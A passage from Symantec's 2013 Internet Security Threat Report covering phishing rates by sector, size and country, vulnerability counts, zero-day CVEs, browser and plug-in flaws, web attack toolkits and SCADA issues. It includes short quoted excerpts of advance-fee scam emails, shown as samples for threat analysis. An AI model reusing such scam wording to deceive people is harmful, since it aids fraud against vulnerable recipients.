in southern Turkey has risen to 101, 834. You must promise<br />
me that you will use 50 percent of my wealth to help the<br />
Syria people that are suffering in Turkey.”<br />
The Syrian conflict again featured in scams such as, “I am<br />
Sgt Douglas Miller Owen, a U.S Army being deployed from<br />
Afghanistan to Damascus, Syria on a 6 month mission<br />
before i finally return back home […] Out of the total fund<br />
my share was $12,000,000 (Twelve Million US Dollars)”<br />
The Libyan revolution and Arab Spring continued to be<br />
referenced in scams during 2012, including, “My name is<br />
Aisha daughter of Shukri Ghanem. We fled from Libya last<br />
year following the uprising against Col Muammar Gaddafi.<br />
[...] My father’s death is no longer news but my mother’s<br />
deteriorating health made me want to do this despite the<br />
fact that I barely know you.”<br />
• 53.7 percent of phishing attacks were conducted through<br />
the use of phishing toolkits.
p. 132<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Analysis of Phishing Activity by Geography, Industry Sector, and Company Size<br />
Background<br />
Phishing activity trends can also reveal patterns that may be<br />
associated with particular geographical locations or hotspots,<br />
for example, the industry sector may also have an influence on<br />
an organization’s risk factor, where certain industries may be<br />
exposed to different levels of threat because of the nature of<br />
their business.<br />
Moreover, the size of an organization can also play a part in<br />
determining their exposure to risk. SMBs may find themselves<br />
the target of a spam attack because SMBs are perceived to be<br />
softer targets because they are less likely to have the same levels<br />
of in-depth defenses, while larger organizations are more likely<br />
to have greater budgetary expenditure applied to their antispam<br />
and <strong>security</strong> countermeasures.<br />
Methodology<br />
Figure c.16. Proportion of Email Traffic Identified as Phishing by Industry Sector, 2012<br />
Source: Symantec.cloud<br />
Gov/Public Sector<br />
Finance<br />
Education<br />
Accom/Catering<br />
Marketing/Media<br />
Non-Profit<br />
General Services<br />
Unknown<br />
Estate Agents<br />
Agriculture<br />
1 in<br />
500<br />
1 in<br />
450<br />
1 in<br />
400<br />
1 in<br />
350<br />
1 in<br />
300<br />
1 in<br />
250<br />
1 in<br />
200<br />
Analysis of phishing activity based on geography, industry,<br />
and size is determined from the patterns of spam activity for<br />
Symantec.cloud clients for threats during 2012.<br />
1 in<br />
150<br />
1 in<br />
100<br />
1 in<br />
50<br />
2011 2012
p. 133<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Figure c.17. Proportion of Email Traffic Identified as Phishing by Organization Size, 2012<br />
Source: Symantec.cloud<br />
1 in 0<br />
1 in 100<br />
1 in 200<br />
1 in 300<br />
1 in 400<br />
1 in 500<br />
1 in 600<br />
1 in 700<br />
1 in 800<br />
1-250<br />
251-500<br />
501-1,000<br />
1,001-1,500<br />
1,501-2,500<br />
Figure c.18. Proportion of Email Traffic Identified as Phishing by Geographic Location, 2012<br />
Source: Symantec.cloud<br />
Netherlands<br />
South Africa<br />
United Kingdom<br />
Denmark<br />
China<br />
Canada<br />
Australia<br />
Cook Islands<br />
Ireland<br />
Italy<br />
2,501+<br />
2011 2012<br />
1 in 1,200 1 in 1,000 1 in 800 1 in 600 1 in 400 1 in 200<br />
2011 2012
p. 134<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Commentary<br />
• The phishing rate has significantly increased for six of<br />
the top 10 geographies in 2012. The highest average rate<br />
for phishing activity in 2012 was for organizations in the<br />
Netherlands, with an overall average phishing rate of 1 in<br />
123.1. In 2011, the highest rate was also for South Africa,<br />
with an overall average phishing rate of 1 in 96.3.<br />
• The phishing rate has decreased across nine of the top 10<br />
industry sectors in 2012, except for Finance. Organizations<br />
in the Government and Public Sector were subjected to the<br />
highest level of phishing activity in 2012, with 1 in 95.4<br />
emails identified and blocked as phishing attacks. In 2011<br />
the sector with the highest average phishing rate was also<br />
the Government and Public Sector, with a phishing rate of 1<br />
in 49.4.<br />
• The phishing rate has decreased for all sizes of organization<br />
in 2012. 1 in 346.0 emails sent to large enterprises with<br />
more than 2,500 employees in 2012 were identified and<br />
blocked as phishing attacks, compared with 1 in 250.5 in<br />
2011.<br />
• 1 in 293.8 emails sent to businesses with up to 250<br />
employees in 2012 were identified and blocked as phishing<br />
attacks, compared with 1 in 266.1 in 2011.
p. 135<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Spam and Fraud Activity Endnotes<br />
01 See http://www.symantec.com/connect/blogs/419-oldest-trick-book-and-yet-another-scam.<br />
02 See http://www.symantec.com/<strong>security</strong>_response/landing/spam/.<br />
03 Simple Mail Transfer Protocol.<br />
04 See http://www.symanteccloud.com/sv/se/globalthreats/learning_center/what_is_skeptic
p. 136<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
APPENDIX :: D<br />
VULNERABILITy<br />
TRENDS
p. 137<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Vulnerability Trends<br />
A vulnerability is a weakness that allows an attacker to compromise the availability,<br />
confidentiality, or integrity of a computer system. Vulnerabilities may be the result of a<br />
programming error or a flaw in the design that will affect <strong>security</strong>. Vulnerabilities can affect<br />
both software and hardware. It is important to stay abreast of new vulnerabilities being<br />
identified in the threat landscape because early detection and patching will minimize the<br />
chances of being exploited.<br />
This section covers selected vulnerability trends and provides analysis and discussion of the trends indicated by the data.<br />
The following metrics are discussed:<br />
• Total Number of Vulnerabilities<br />
• Zero-day Vulnerabilities<br />
• Web Browser Vulnerabilities<br />
• Web Browser Plug-in Vulnerabilities<br />
• Web Attack Toolkits
p. 138<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Total Number of Vulnerabilities<br />
Background<br />
The total number of vulnerabilities for 2012 is based on research<br />
from independent <strong>security</strong> experts and vendors of affected<br />
products. The yearly total also includes zero-day vulnerabilities<br />
that attackers uncovered and were subsequently identified<br />
post-exploitation. Calculating the total number of vulnerabilities<br />
provides insight into vulnerability research being conducted in<br />
the threat landscape. There are many motivations for conducting<br />
vulnerability research, including <strong>security</strong>, academic, promotional,<br />
software quality assurance, and, of course, the malicious<br />
motivations that drive attackers. Symantec gathers information<br />
on all of these vulnerabilities as part of its DeepSight<br />
vulnerability database and alerting services. Examining these<br />
trends also provides further insight into other topics discussed in<br />
this report.<br />
Discovering vulnerabilities can be advantageous to both sides<br />
of the <strong>security</strong> equation: legitimate researchers may learn<br />
how better to defend against attacks by analyzing the work of<br />
attackers who uncover vulnerabilities; conversely, cybercriminals<br />
can capitalize on the published work of legitimate researchers<br />
to advance their attack capabilities. The vast majority of<br />
vulnerabilities that are exploited by attack toolkits are publicly<br />
known by the time they are exploited.<br />
Methodology<br />
Information about vulnerabilities is made public through<br />
a number of sources. These include mailing lists, vendor<br />
advisories, and detection in the wild. Symantec gathers<br />
this information and analyzes various characteristics of<br />
the vulnerabilities, including technical information and<br />
ratings in order to determine the severity and impact of the<br />
vulnerabilities. This information is stored in the DeepSight<br />
vulnerability database, which houses over 52,795 distinct<br />
vulnerabilities spanning a period of over 20 years. As part of<br />
the data gathering process, Symantec scores the vulnerabilities<br />
according to version 2.0 of the community-based CVSS (Common<br />
Vulnerability Scoring System). 1 Symantec adopted version 2.0 of<br />
the scoring system in 2008. The total number of vulnerabilities<br />
is determined by counting all of the vulnerabilities published<br />
during the reporting period. All vulnerabilities are included,<br />
regardless of severity or whether or not the vendor who produced<br />
the vulnerable product confirmed them.
p. 139<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Data<br />
Figure D.1. Total Vulnerabilities Identified, 2006–2012<br />
Source: Symantec<br />
6,000<br />
5,000<br />
4,000<br />
3,000<br />
2,000<br />
1,000<br />
Figure D.2. New Vulnerabilities Month by Month, 2011 and 2012<br />
Source: Symantec<br />
600<br />
500<br />
400<br />
300<br />
200<br />
100<br />
JAN<br />
4,842<br />
2006<br />
FEB<br />
4,644<br />
2007<br />
MAR<br />
APR<br />
5,562<br />
2008<br />
MAY<br />
JUN<br />
4,814<br />
2009<br />
JUL<br />
6,253<br />
AUG<br />
2010<br />
SEP<br />
4,814<br />
2011<br />
OCT<br />
NOV<br />
5,291<br />
2012<br />
DEC<br />
2011 2012
p. 140<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Figure D.3. Most Frequently Attacked Vulnerabilities in 2012<br />
Source: Symantec<br />
MILLIONS<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
62<br />
BID 31874<br />
BID Detail<br />
11 11 11 11<br />
BID 8234<br />
BID 10127<br />
BID 6005<br />
BID 8811<br />
BiD 31874 Microsoft Windows server service rPc Handling remote code execution Vulnerability<br />
BiD 8234 Microsoft Windows rPc service Denial of service Vulnerability<br />
BiD 10127 Microsoft Windows rPcss DcOM interface Denial of service Vulnerability<br />
BiD 6005 Microsoft Windows rPc service Denial of service Vulnerability<br />
BiD 8811 Microsoft Windows rPcss Multi-thread race condition Vulnerability<br />
Commentary<br />
• Actual number of new vulnerabilities reported is up,<br />
and trend is still upwards: The total number of new<br />
vulnerabilities reported in 2012 stood at 5,291. This figure<br />
works out to approximately 101 new vulnerabilities a<br />
week. Compared with the number from 2011, which was<br />
4,989, it represents an increase of 6 percent from that<br />
of 2011. We can see that the overall pattern is still on an<br />
upward trajectory. The number of vulnerabilities reported<br />
in January <strong>2013</strong> amounts to 503, which is more than the<br />
numbers reported in the same month last year.<br />
• The most often exploited vulnerabilities are not the<br />
newest: From observation of in-field telemetry, we can see<br />
that the most frequently used vulnerability in attacks is<br />
not the newest. Our data show that the most commonly<br />
attacked component by a wide margin is the Microsoft<br />
Windows RPC component. The attacks against this<br />
component are mostly using the Microsoft Windows Server<br />
Service RPC Handling Remote Code Execution Vulnerability<br />
(BID 31874 2 ). This vulnerability was first reported back in<br />
October 2008 and Symantec blocked 61.9 million attempts<br />
to exploit it in 2012. This figure represents 5.7 times the<br />
volume of the second most exploited vulnerability, the<br />
Microsoft Windows RPCSS DCOM Interface Denial of<br />
Service Vulnerability (BID 8234 3 ), from July 2003.<br />
• The next two most often used vulnerabilities are the<br />
Microsoft Windows RPCSS DCOM Interface Denial of
p. 141<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Service Vulnerability (BID 10127 4 ), dating from April 2004,<br />
and the Microsoft Windows RPC Service Denial of Service<br />
Vulnerability (BID 6005 5 ), from October 2002.<br />
• Finally, the fifth most exploited vulnerability is the<br />
Microsoft Windows RPCSS Multi-thread Race Condition<br />
Vulnerability (BID 8811 6 ), reported in October 2003.<br />
• All of the top five vulnerabilities are several years old<br />
with patches available: So why are they used so often even<br />
several years after patches are available? There could be<br />
several reasons why this is the case:<br />
• Trading of vulnerabilities 7 either through legitimate or<br />
clandestine channels has given exploitable vulnerabilities<br />
a significant monetary value. Because of the restricted<br />
information available on some of these new vulnerabilities,<br />
criminals may not be able to take advantage of them unless<br />
they are willing to pay the often substantial asking prices.<br />
If they are unable or unwilling to pay, they may resort to<br />
existing, widely available, tried-and-tested vulnerabilities<br />
to achieve their goals, even if it may potentially be less<br />
effective.<br />
• For those willing to pay, they will want to ensure maximum<br />
return on their investment. This could mean they will use it<br />
discretely and selectively rather than making a big splash<br />
and arousing the attention of <strong>security</strong> vendors and other<br />
criminal groups looking for new vulnerabilities to use.<br />
• Older vulnerabilities have a more established malware<br />
user base and so account for a greater amount of traffic.<br />
For example, widespread and well-established malware<br />
threats, such as W32.Downadup 8 and its variants, use the<br />
Microsoft Windows Server Service RPC Handling Remote<br />
Code Execution Vulnerability (BID 31874), which continues<br />
to register over 150,000 hits each day. Because these threats<br />
use vulnerabilities to spread in an automated fashion, the<br />
number of attacks they can launch would generally be far<br />
higher than for targeted attacks.<br />
• For various reasons, not all of the user population applies<br />
<strong>security</strong> patches quickly or at all. This means older<br />
vulnerabilities can often still be effective, even years after<br />
patches are available. Because of this, there will always a<br />
window of opportunity for criminals to exploit and they are<br />
all too aware of this.<br />
• File-based vulnerabilities: The most commonly exploited<br />
data file format is the PDF file format. One of the PDF<br />
related vulnerabilities, Adobe Acrobat, Adobe Reader, and<br />
Adobe Flash Player Remote Code Execution Vulnerability<br />
(BID 35759 9 ) registered as the fifth most often used<br />
vulnerability in 2011 with just over 1 million attacks<br />
reported. PDF files containing vulnerabilities are often<br />
associated with Advanced Persistent Threat (APT 10 ) style<br />
attacks, rather than self-replicating malware. However,<br />
in this particular case, the vulnerability in question was<br />
most often used in Web toolkit-based attacks. This attack<br />
scenario involves creating malicious websites to host<br />
exploit code. Users may then be tricked into visiting these<br />
malicious toolkit websites either by website redirection (for<br />
example, malicious IFRAMEs), SEO poisoning or by sending<br />
out spam emails, instant messages or social media updates<br />
with links to the malicious website. More information<br />
on Web browser vulnerabilities can be found later in this<br />
report.<br />
• One thing to note, websites hosting malicious toolkits often<br />
contain multiple exploits that can be tried against the<br />
visitor. In some cases, the kit will attempt to use all exploits<br />
at its disposal in a non-intelligent fashion whereas in more<br />
modern advanced kits, the website code will attempt to<br />
fingerprint the software installed on the computer before<br />
deciding which exploit(s) to send to maximize the success<br />
rate. The fact that there are so many Web-kit-based exploit<br />
attempts made using this old vulnerability may suggest that<br />
a considerable number of users have not updated their PDF<br />
readers to a non-vulnerable version.
p. 142<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Zero-day Vulnerabilities<br />
Background<br />
A zero-day vulnerability is one that is reported to have been<br />
exploited in the wild before the vulnerability is public knowledge<br />
and prior to a patch being publicly available. The absence<br />
of a patch for a zero-day vulnerability presents a threat to<br />
organizations and consumers alike, because in many cases<br />
these threats can evade purely signature-based detection until a<br />
patch is released. The unexpected nature of zero-day threats is a<br />
serious concern, especially because they may be used in targeted<br />
attacks and in the propagation of malicious code.<br />
Data<br />
Figure D.4. Volume of Zero-day Vulnerabilities, 2006–2012<br />
Source: Symantec<br />
20<br />
15<br />
10<br />
5<br />
13<br />
2006<br />
15<br />
2007<br />
9<br />
2008<br />
12<br />
2009<br />
14<br />
2010<br />
Methodology<br />
Zero-day vulnerabilities are a sub-set of the total number of<br />
vulnerabilities documented over the reporting period. A zeroday<br />
vulnerability is one that appears to have been exploited in<br />
the wild prior to being publicly known. It may not have been<br />
known to the affected vendor prior to exploitation and, at the<br />
time of the exploit activity, the vendor had not released a patch.<br />
The data for this section consists of the vulnerabilities that<br />
Symantec has identified that meet the above criteria.<br />
8<br />
2011<br />
14<br />
2012
p. 143<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Figure D.5. Zero-day Vulnerabilities Identified in 2012<br />
Source: Symantec<br />
CVE Detail<br />
cVe-2012-0003 Microsoft Windows Media Player “winmm.dll” MiDi File Parsing remote Buffer Overflow Vulnerability<br />
cVe-2012-0056 Linux Kernel cVe-2012-0056 Local Privilege escalation Vulnerability<br />
cVe-2012-0507 Oracle Java se remote Java runtime environment code execution Vulnerability<br />
cVe-2012-0767 Adobe Flash Player cVe-2012-0767 cross site scripting Vulnerability<br />
cVe-2012-0779 Adobe Flash Player cVe-2012-0779 Object type confusion remote code execution Vulnerability<br />
cVe-2012-1535 Adobe Flash Player cVe-2012-1535 remote code execution Vulnerability<br />
cVe-2012-1856 Microsoft Windows common controls ActiveX control cVe-2012-1856 remote code execution Vulnerability<br />
cVe-2012-1875 Microsoft <strong>internet</strong> explorer cVe-2012-1875 same iD Property remote code execution Vulnerability<br />
cVe-2012-1889 Microsoft XML core services cVe-2012-1889 remote code execution Vulnerability<br />
cVe-2012-4792 Microsoft <strong>internet</strong> explorer “cDwnBindinfo” use-After-Free remote code execution Vulnerability<br />
cVe-2012-4969 Microsoft <strong>internet</strong> explorer image Arrays use-After-Free remote code execution Vulnerability<br />
cVe-2012-5076 Oracle Java se cVe-2012-5076 remote Java runtime environment Vulnerability<br />
cVe-MAP-nOMAtcH Parallels Plesk Panel unspecified remote <strong>security</strong> Vulnerability<br />
cVe-MAP-nOMAtcH Microsoft Windows Digital certificates spoofing Vulnerability<br />
Commentary<br />
• 2012 sees an increase in number of zero-day vulnerabilities<br />
compared to 2011. There was a 75 percent increase in<br />
vulnerabilities seen in 2012 compared with 2011. However,<br />
the number of vulnerabilities seen in 2012 was inflated due<br />
to Microsoft file-based vulnerabilities whereas Adobe basedvulnerabilities<br />
total up to three compared to four in 2011,<br />
when they topped the chart.<br />
• There were three zero-day browser vulnerabilities seen in<br />
2012, an increase of 2 from 2011. This corresponds with<br />
the dramatic increase in browser vulnerabilities compared<br />
to the total seen in 2011. With the trend moving into<br />
Web attacks, more and more browser vulnerabilities are<br />
leveraged by the attackers.<br />
• While the overall number of zero-day vulnerabilities is up,<br />
attacks using these vulnerabilities continue to be successful.<br />
Some of these vulnerabilities are leveraged in targeted<br />
attacks. Adobe Flash Player and Microsoft Windows ActiveX<br />
Control vulnerabilities are widely used in targeted attacks,<br />
and vulnerabilities in Microsoft technologies accounted for<br />
almost 50 percent of the zero-day vulnerabilities seen in<br />
2012.<br />
• Most of the attack scenarios are planned in such a way that<br />
an attacker crafts a malicious Web page to leverage the issue<br />
and uses email or other means to distribute the page and<br />
entices an unsuspecting user to view it. When the victim<br />
views the page, the attacker-supplied code is run.
p. 144<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Web Browser Vulnerabilities<br />
Background<br />
Web browsers are ever-present components for computing<br />
for both enterprise and individual users on desktop and on<br />
mobile devices. Web browser vulnerabilities are a serious<br />
<strong>security</strong> concern due to their role in online fraud and in the<br />
propagation of malicious code, spyware, and adware. In addition,<br />
Web browsers are exposed to a greater amount of potentially<br />
untrusted or hostile content than most other applications and<br />
are particularly targeted by multi-exploit attack kits.<br />
Web-based attacks can originate from malicious websites as<br />
well as from legitimate websites that have been compromised<br />
to serve malicious content. Some content, such as media files or<br />
documents are often presented in browsers via browser plugin<br />
technologies. While browser functionality is often extended<br />
by the inclusion of various plug-ins, the addition of plug-in<br />
components also results in a wider potential attack surface for<br />
client-side attacks.<br />
Data<br />
Figure D.6. Browser Vulnerabilities, 2011 and 2012<br />
Source: Symantec<br />
600<br />
500<br />
400<br />
300<br />
200<br />
100<br />
APPLE SAFARI<br />
GOOGLE<br />
CHROME<br />
MICROSOFT<br />
INTERNET EXPLORER<br />
Methodology<br />
Browser vulnerabilities are a sub-set of the total number of<br />
vulnerabilities cataloged by Symantec throughout the year. To<br />
determine the number of vulnerabilities affecting browsers,<br />
Symantec considers all vulnerabilities that have been publicly<br />
reported, regardless of whether they have been confirmed by<br />
the vendor. While vendors do confirm the majority of browser<br />
vulnerabilities that are published, not all vulnerabilities may<br />
have been confirmed at the time of writing. Vulnerabilities that<br />
are not confirmed by a vendor may still pose a threat to browser<br />
users and are therefore included in this study.<br />
MOZILLA FIREFOX<br />
OPERA<br />
2011 2012<br />
This metric examines the total<br />
number of vulnerabilities<br />
affecting the following Web<br />
browsers:<br />
• Apple Safari<br />
• Google Chrome<br />
• Microsoft Internet Explorer<br />
• Mozilla Firefox<br />
• Opera
p. 145<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Commentary<br />
• All vulnerabilities dramatically increased in 2012, except<br />
Opera and Microsoft Internet Explorer, which saw a slight<br />
increase.<br />
• Chrome vulnerabilities increased dramatically in 2012<br />
(268). This could be due to the series of exploits developed<br />
to prove that Chrome is not unbreakable. After a spike in<br />
2010 (191), the documented vulnerabilities for Chrome<br />
browser dropped to 62 for 2011, which is a similar level<br />
as in previous years. Several bug bounty programs were<br />
organized in 2012, which has contributed to the exposure<br />
of a lot of Chrome vulnerabilities.<br />
• These five browsers combined had 891 reported<br />
vulnerabilities in total in 2012, which is a strong increase<br />
from 351 in 2011. This increase is due to dramatically<br />
increased vulnerabilities seen in Safari, Chrome, and<br />
Firefox.
p. 146<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Web Browser Plug-in Vulnerabilities<br />
Background<br />
This metric examines the number of vulnerabilities affecting<br />
plug-ins for Web browsers. Browser plug-ins are technologies<br />
that run inside the Web browser and extend its features, such<br />
as allowing additional multimedia content from Web pages<br />
to be rendered. Although this is often run inside the browser,<br />
some vendors have started to use sandbox containers to execute<br />
plug-ins in order to limit the potential harm of vulnerabilities.<br />
Unfortunately, Web browser plug-ins continue to be one of<br />
the most exploited vectors for Web-based attacks and drive-by<br />
downloads silently infecting consumer and enterprise users.<br />
Many browsers now include various plug-ins in their default<br />
installation and provide a framework to ease the installation<br />
of additional plug-ins. Plug-ins now provide much of the<br />
expected or desired functionality of Web browsers and are often<br />
required in order to use many commercial sites. Vulnerabilities<br />
affecting these plug-ins are an increasingly favored vector for<br />
a range of client-side attacks, and the exploits targeting these<br />
vulnerabilities are commonly included in attack kits. Web attack<br />
kits can exploit up to 25 different browser and browser plug-in<br />
vulnerabilities at one time and then have full access to download<br />
any malware to the endpoint system.<br />
Some plug-in technologies include automatic update<br />
mechanisms that aid in keeping software up to date, which may<br />
aid in limiting exposure to certain vulnerabilities. Enterprises<br />
that choose to disable these updating mechanisms, or continue<br />
to use vulnerable versions, will continue to put their enterprises<br />
at considerable risk to silent infection and exploitation. With<br />
the hundreds of millions of drive-by download attacks that<br />
Symantec identified in 2011, Web attacks continue to be a<br />
favorite infection vector for hackers and malware authors to<br />
breach enterprises and consumer systems. To help mitigate<br />
the risk, some browsers have started to check for the version of<br />
installed third-party plug-ins and inform the user if there are<br />
any updates available for install. Enterprises should also check<br />
if every browser plug-in is needed and consider removing or<br />
disabling potentially vulnerable software.<br />
Methodology<br />
Web browser plug-in vulnerabilities comprise a sub-set of<br />
the total number of vulnerabilities cataloged by Symantec<br />
over the reporting period. The vulnerabilities in this section<br />
cover the entire range of possible severity ratings and include<br />
vulnerabilities that are both unconfirmed and confirmed by the<br />
vendor of the affected product. Confirmed vulnerabilities consist<br />
of <strong>security</strong> issues that the vendor has publicly acknowledged,<br />
by either releasing an advisory or otherwise making a public<br />
statement to concur that the vulnerability exists. Unconfirmed<br />
vulnerabilities are vulnerabilities that are reported by third<br />
parties, usually <strong>security</strong> researchers, which have not been<br />
publicly confirmed by the vendor. That a vulnerability is<br />
unconfirmed does not mean that the vulnerability report is<br />
not legitimate, only that the vendor has not released a public<br />
statement to confirm the existence of the vulnerability.
p. 147<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Data<br />
Figure D.7. Browser Plug-in Vulnerabilities in 2011 and 2012<br />
Source: Symantec<br />
120<br />
100<br />
80<br />
60<br />
40<br />
20<br />
ADOBE ACROBAT<br />
READER<br />
ADOBE<br />
FLASH<br />
ACTIVE X<br />
APPLE<br />
QUICKTIME<br />
Commentary<br />
• In 2012, 312 vulnerabilities affecting browser plug-ins were<br />
documented by Symantec, a very slight increase compared<br />
to 308 vulnerabilities affecting browser plug-ins in 2011.<br />
• ActiveX vulnerabilities increased in 2012, which may be due<br />
to the increase in Internet Explorer vulnerabilities.<br />
• Adobe Flash Player and Java vulnerabilities increased in<br />
2012. This trend was already visible in 2011 and grew again.<br />
This is also reflected in the vulnerability usage in attack<br />
toolkits, which have focused around Adobe Flash Player,<br />
Adobe PDF Reader, and Java in 2012.<br />
FIREFOX<br />
EXTENSION<br />
ORACLE<br />
SUN JAVA<br />
2011 2012<br />
Symantec identified the<br />
following plug-in technologies<br />
as having the most reported<br />
vulnerabilities in 2012:<br />
• Adobe Reader<br />
• Adobe Flash Player<br />
• Apple QuickTime<br />
• Microsoft ActiveX<br />
• Mozilla Firefox extensions<br />
• Oracle Sun Java Platform<br />
Standard Edition (Java SE)
p. 148<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Web Attack Toolkits<br />
Background<br />
Web attack toolkits are a collection of scripts, often PHP files,<br />
which are used to create malicious websites that will use<br />
Web exploits to infect visitors. There are a few dozen known<br />
families used in the wild. Many toolkits are traded or sold on<br />
underground forums for US$100-1,000. Some are actively<br />
developed and new vulnerabilities are added over time, such as<br />
the Blackhole and Eleonore toolkits, which both added exploits<br />
for a variety of vulnerabilities during 2012.<br />
Each new toolkit version released during the year was<br />
accompanied with increased malicious Web attack activity.<br />
As a new version emerges that incorporates new exploit<br />
functionality, we see an increased use of it in the wild, making<br />
as much use of the new exploits until potential victims have<br />
patched their systems.<br />
Since many toolkits often use the same exploits, it is often<br />
difficult to identify the specific attack toolkit behind each<br />
infection attempt. On average, an attack toolkit contains around<br />
10 different exploits, mostly focusing on browser independent<br />
plug-in vulnerabilities found in applications such as Adobe<br />
Flash Player, PDF viewers, and Java. In general, older exploits<br />
are not removed from the toolkits, since some systems may still<br />
be unpatched. This is perhaps why many of the toolkits still<br />
contain an exploit for the old Microsoft MDAC RDS.Dataspace<br />
ActiveX Control Remote Code Execution Vulnerability (BID<br />
17462) from 2006. The malicious script will test all possible<br />
exploits in sequence until one succeeds. This may magnify the<br />
attack numbers seen for older vulnerabilities, even if they were<br />
unsuccessful.<br />
For more information on Web attack toolkits, please read<br />
Appendix A: Threat Activity Trends: Analysis of Malicious Web<br />
Activity by Attack Toolkits.
p. 149<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
SCADA Vulnerabilities<br />
Background<br />
This metric will examine the SCADA (Supervisory Control and<br />
Data Acquisition) <strong>security</strong> threat landscape. SCADA represents<br />
a wide range of protocols and technologies for monitoring<br />
and managing equipment and machinery in various sectors of<br />
critical infrastructure and industry. This includes—but is not<br />
limited to—power generation, manufacturing, oil and gas, water<br />
treatment, and waste management. Therefore, the <strong>security</strong><br />
of SCADA technologies and protocols is a concern related to<br />
national <strong>security</strong> because the disruption of related services can<br />
result in the failure of infrastructure and potential loss of life,<br />
among other consequences.<br />
Methodology<br />
This discussion is based on data surrounding publicly known<br />
vulnerabilities affecting SCADA technologies. The purpose<br />
of the metric is to provide insight into the state of <strong>security</strong><br />
research in relation to SCADA systems. To a lesser degree, this<br />
may provide insight into the overall state of SCADA <strong>security</strong>.<br />
Vulnerabilities affecting SCADA systems may present a threat<br />
to critical infrastructure that relies on these systems. Due to the<br />
potential for disruption of critical services, these vulnerabilities<br />
may be associated with politically motivated or state-sponsored<br />
attacks. This is a concern for governments and/or enterprises<br />
that are involved in the critical infrastructure sector. While<br />
this metric provides insight into public SCADA vulnerability<br />
disclosures, due to the sensitive nature of vulnerabilities<br />
affecting critical infrastructure there is likely private <strong>security</strong><br />
research conducted by SCADA technology and <strong>security</strong> vendors.<br />
Symantec does not have insight into any private research<br />
because the results of such research are not publicly disclosed.<br />
Data<br />
The number of SCADA vulnerabilities decreased dramatically<br />
in 2012. In 2012, there were 85 public SCADA vulnerabilities, a<br />
massive decrease when compared to the 129 vulnerabilities in<br />
2011.<br />
Commentary<br />
Since the emergence of Stuxnet in 2010, the <strong>security</strong> of SCADA<br />
systems has been an area of concern. SCADA systems are<br />
generally not designed to be connected to the public Internet,<br />
but as Stuxnet demonstrated, this is not always a guarantee<br />
of <strong>security</strong> as locally connected networks may become<br />
compromised and USB devices may also be used as an infection<br />
vehicle. As new vulnerabilities are discovered, the importance<br />
of providing a fix quickly is even greater for SCADA systems,<br />
but they can sometimes remain unpatched for longer than<br />
traditional software vulnerabilities.
p. 150<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERABILITy TRENDS<br />
Vulnerability Trends Endnotes<br />
01 See http://www.first.org/cvss/cvss-guide.html.<br />
02 See http://www.<strong>security</strong>focus.com/bid/31874.<br />
03 See http://www.<strong>security</strong>focus.com/bid/8234.<br />
04 See http://www.<strong>security</strong>focus.com/bid/10127.<br />
05 See http://www.<strong>security</strong>focus.com/bid/6005.<br />
06 See http://www.<strong>security</strong>focus.com/bid/8811.<br />
07 See http://www.darkreading.com/vulnerability-management/167901026/<strong>security</strong>/attacks-breaches/231900575/more-exploitsfor-sale-means-better-<strong>security</strong>.html.<br />
08 See http://www.symantec.com/<strong>security</strong>_response/writeup.jsp?docid=2008-112203-2408-99.<br />
09 See http://www.<strong>security</strong>focus.com/bid/35759.<br />
10 See http://go.symantec.com/apt.
p. 151<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
APPENDIX :: E<br />
GOVERNMENT ThREAT<br />
ACTIVITy TRENDS
p. 152<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
GOVERNMENT ThREAT ACTIVITy TRENDS<br />
Government Threat Activity Trends<br />
Whether the purposes behind government-targeted attacks involve disagreements<br />
with policies or programs, or are motivated by espionage or attempts to steal classified<br />
information for profit or other reasons, such attacks can have serious ramifications<br />
on organizations and those they serve. The Symantec Global Internet Security Threat<br />
Report provides an analysis of threat activity trends relating to government and Critical<br />
Infrastructure Protection (CIP), including malicious activity that Symantec observed in 2012.<br />
Attacks are defined as any malicious activity carried out over a network that has been<br />
detected by an intrusion detection system (IDS) or firewall. Definitions for the other<br />
types of malicious activities can be found in their respective sections within this report.<br />
This section covers the following metrics and provides analysis and discussion of the trends indicated by the data:<br />
• Malicious Activity by Critical Infrastructure Sector<br />
